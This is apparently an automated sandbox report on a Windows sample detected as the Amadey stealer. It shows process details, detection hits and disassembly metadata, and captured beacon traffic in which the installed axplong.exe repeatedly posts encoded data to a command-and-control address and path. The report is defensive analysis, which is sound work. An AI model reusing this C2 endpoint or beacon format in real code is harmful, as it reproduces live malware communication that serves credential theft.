Sep 27, 2024 07:03:23.326956034 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:24.034288883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	49792	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:24.043750048 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:24.932769060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.8	49793	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:25.047739029 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:25.774473906 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.8	49794	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:25.784295082 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:26.516284943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.8	49795	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:26.647849083 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:27.350248098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.8	49796	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:27.359035015 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.8	49797	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:27.484380007 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:28.183264017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.8	49798	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:28.192547083 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:28.900022030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Target ID:	0
Start time:	01:01:22
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x3c0000
File size:	1'929'216 bytes
MD5 hash:	17DCD72D51948D374C79BE3A52BB647A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1599973179.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1559809614.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:01:26
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xd10000
File size:	1'929'216 bytes
MD5 hash:	17DCD72D51948D374C79BE3A52BB647A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1639117763.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1598600536.0000000005310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:01:26
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xd10000
File size:	1'929'216 bytes
MD5 hash:	17DCD72D51948D374C79BE3A52BB647A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1600539276.0000000004F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1644644510.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:02:00
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xd10000
File size:	1'929'216 bytes
MD5 hash:	17DCD72D51948D374C79BE3A52BB647A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.1935678537.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 051102FB Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 1a19d64eb65a201adba7ed4b7f08cd9ccf09169cfe94be121d6e77b595eb8fe6
Instruction ID: b341da6ad304f6a71fdcfefdd1f58c0b5447701e3d148a677651dd1ada7f6419
Opcode Fuzzy Hash: 1a19d64eb65a201adba7ed4b7f08cd9ccf09169cfe94be121d6e77b595eb8fe6
Instruction Fuzzy Hash: BB21C9FB51C111AFA256C5815B5C9FB3B2EE6CA73073284BAFC42C5403D3954E994139

Function 05110386 Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 94d671667aa748322cc3302067affd357869bf09c0f2344063c92a4febfe4c12
Instruction ID: ff13bfd022b0a25b53e89849c6503baf60a7f545d2c7fae2cc9a301ef171da02
Opcode Fuzzy Hash: 94d671667aa748322cc3302067affd357869bf09c0f2344063c92a4febfe4c12
Instruction Fuzzy Hash: 1E21A3EB95C110AF6166C5815A9CEFB2B2EE5CA73033284B6FC43C5502E3944ECA5479

Function 05110330 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 153ee373839cf1c5f1139c706496da84e2c74d5d67101ff8578b3f47c62023f6
Instruction ID: a15d42d33f8d4077e6e1e65c6716220e2764c8c4e73e8901eac6da8677c20930
Opcode Fuzzy Hash: 153ee373839cf1c5f1139c706496da84e2c74d5d67101ff8578b3f47c62023f6
Instruction Fuzzy Hash: 2921E9FA50D251AFE212C6919F5C9FB3B2EE6CA73073184BBF842C6443D3940A894135

Function 05110321 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 9ed2a57729cd0676dc0e8cfc25512af04f198f43d2aac85079d01cdce1818d59
Instruction ID: cbb3614d96b4dae7cd451e4db283c938206c7e0403feaaf0df1ec2fdcbb472d8
Opcode Fuzzy Hash: 9ed2a57729cd0676dc0e8cfc25512af04f198f43d2aac85079d01cdce1818d59
Instruction Fuzzy Hash: 6B2180EB91C110BF6166C5815B5CDFB2B2EE5CA73033284B6FC42D6902E3944ECA5579

Function 0511036B Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 3c6f6406f5dc5437c5da85fe9a20940bfb2b913ee0740b2d5b9d7837e5d304a4
Instruction ID: 26b3e5e37f382f29625600ec1cac336e21b6edfebe4edc2225dc6221c8166d15
Opcode Fuzzy Hash: 3c6f6406f5dc5437c5da85fe9a20940bfb2b913ee0740b2d5b9d7837e5d304a4
Instruction Fuzzy Hash: 0B2162EBA1C110BFA256C5815F5C9FA6B3EE5DA23033284B6FC42C6407E3954ECA553A

Function 051103D0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: b44a23b74072931d0910c81ea333e9e6a7b9b674abce3160864bf72af973c07d
Instruction ID: 1c6143c3051da9ee3ac5b9ba69d72ddb712b7229441fd1166eef45190937d410
Opcode Fuzzy Hash: b44a23b74072931d0910c81ea333e9e6a7b9b674abce3160864bf72af973c07d
Instruction Fuzzy Hash: 1F11A2EB918110BFA122C5816F9C9FB6B2EE5C9630332C4B6FC42C5806E3944E8A4539

Function 051103BE Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: bd2acf3b71d6f322fd11a4cbeb1a166bd14def62336ac4e14393c91062af4a31
Instruction ID: a2d85b00d38eea3242165c4f9fd69c60a73917bfc9c2db0ca04e31eb163dfba0
Opcode Fuzzy Hash: bd2acf3b71d6f322fd11a4cbeb1a166bd14def62336ac4e14393c91062af4a31
Instruction Fuzzy Hash: 790161FB948114BFA161D6819F9C9FB6B3EF5D973033284B6F842C5802E3A44EDA4539

Function 05110406 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: a03eae479f2f3f886b3f70d123e0f4906ca9c796ff16fc9e9b920105152e44aa
Instruction ID: a92a15f0c0ab559c9cbcd751353992912657151e4cf07deb2bb14d43389b7f8c
Opcode Fuzzy Hash: a03eae479f2f3f886b3f70d123e0f4906ca9c796ff16fc9e9b920105152e44aa
Instruction Fuzzy Hash: 0D01FCB65082119FC3629651899C5F77B36F98623033140BAF48287803D3550ED58629

Function 051103F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 574936c32e116b924525bf929343e8e2b99e34eabf611db38e784532cc9c08f8
Instruction ID: 4fc5da97b5fe454c14e183beb43db197c0b4a1e46f07abae532f609382327bb8
Opcode Fuzzy Hash: 574936c32e116b924525bf929343e8e2b99e34eabf611db38e784532cc9c08f8
Instruction Fuzzy Hash: 81F028BAA0C110EF9162D5819FCC5FB3B26F9C923033284F6F84286802E7944EC6453E

Function 0511042A Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 2df1bd5bf746ac2cfef051265bd49f50c8b2db572f667bc0d1baeb11417b1e27
Instruction ID: ff3ef426414b5617648c4622b896456a178908387ae4c9d47a0f1e3d778acdb1
Opcode Fuzzy Hash: 2df1bd5bf746ac2cfef051265bd49f50c8b2db572f667bc0d1baeb11417b1e27
Instruction Fuzzy Hash: 93F0FCA9508250DFC2629691868C5FA3B26FA9623033144FDF88246803E7940A9A4629

Function 05110448 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

f!/v, xrefs: 05110466

Memory Dump Source

Source File: 00000000.00000002.1602143372.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5110000_file.jbxd

Similarity

API ID:
String ID: f!/v
API String ID: 0-2919020400
Opcode ID: 23bf363ba235bd8c8807bad58c7fee50e79560f4cf7985d2116d3e39087303c1
Instruction ID: 132ab663c455c4ac9f44c9d8b18286440a7e6f195b76d14f4687418a6038404f
Opcode Fuzzy Hash: 23bf363ba235bd8c8807bad58c7fee50e79560f4cf7985d2116d3e39087303c1
Instruction Fuzzy Hash: BFF027BB998250AFC25296A04A9C5F77F39B9C623433145FAF4C297503D3D84F894635

Analysis Process: axplong.exePID: 5760, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.5%
Total number of Nodes:	541
Total number of Limit Nodes:	33

Executed Functions

Function 00D1BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00D68D70,00000000,00000000,00000000,00000000), ref: 00D1BDEC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D1BE10
HttpOpenRequestA.WININET(?,00000000), ref: 00D1BE5A
HttpSendRequestA.WININET(?,00000000), ref: 00D1BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 00D1BFCC
InternetCloseHandle.WININET(?), ref: 00D1C0A7
InternetCloseHandle.WININET(?), ref: 00D1C0AF
InternetCloseHandle.WININET(?), ref: 00D1C0B7

Strings

invalid stoi argument, xrefs: 00D1E404
RHYTYv==, xrefs: 00D1BE33
RpKt, xrefs: 00D1D516
8KG0fymoFx==, xrefs: 00D1C2EB, 00D1C543
8KG0fCKZFzY=, xrefs: 00D1C385
stoi argument out of range, xrefs: 00D1E3FA

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
API String ID: 688256393-332458646
Opcode ID: d8a92d7f59359513fb0684d748da57a05a9062fc7b08bbcfedf6fa9ac44c2145
Instruction ID: 0a43eb59105a058489f4007c5ab37a122da1bf8ba738406e9fb4b9b13c914fb5
Opcode Fuzzy Hash: d8a92d7f59359513fb0684d748da57a05a9062fc7b08bbcfedf6fa9ac44c2145
Instruction Fuzzy Hash: EEB1E4B0650218ABEB24CF28DC85BEDBBB5EF45304F5041A9F50897282DB759AC4CFB5

Function 00D246C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00D27870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00D2795C
Part of subcall function 00D27870: __Cnd_destroy_in_situ.LIBCPMT ref: 00D27968
Part of subcall function 00D27870: __Mtx_destroy_in_situ.LIBCPMT ref: 00D27971

Part of subcall function 00D1BD60: InternetOpenW.WININET(00D68D70,00000000,00000000,00000000,00000000), ref: 00D1BDEC
Part of subcall function 00D1BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D1BE10
Part of subcall function 00D1BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00D1BE5A

std::_Xinvalid_argument.LIBCPMT ref: 00D24EA2

Strings

9526, xrefs: 00D2531D
JB6, xrefs: 00D253F5
stoi argument out of range, xrefs: 00D24269, 00D24EAC
246122658369, xrefs: 00D24F3A, 00D24F4D, 00D24F8F, 00D24F99, 00D254F4
8ZF6, xrefs: 00D25502
5F6, xrefs: 00D25497
aZT6, xrefs: 00D253CC
mP=, xrefs: 00D26383, 00D26652
KFT0PL==, xrefs: 00D254B9
MJF+, xrefs: 00D247BD, 00D248EC, 00D24ADC, 00D24C0B
V0N6, xrefs: 00D2537A
Fz==, xrefs: 00D2369E, 00D24D2D
6F9fr==, xrefs: 00D24712
aqB6, xrefs: 00D254DB
V0x6, xrefs: 00D2541E
9KN6, xrefs: 00D25351
WJP6, xrefs: 00D253A3
fed3aa, xrefs: 00D25489
96B6, xrefs: 00D25470
Vp 6, xrefs: 00D25447
MJB+, xrefs: 00D24776, 00D247ED, 00D24A95, 00D24B0C

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 2414744145-1662704651
Opcode ID: 59122ff5e75c6425006e1677f155552bf63c08e45b65492b494481140f8607ea
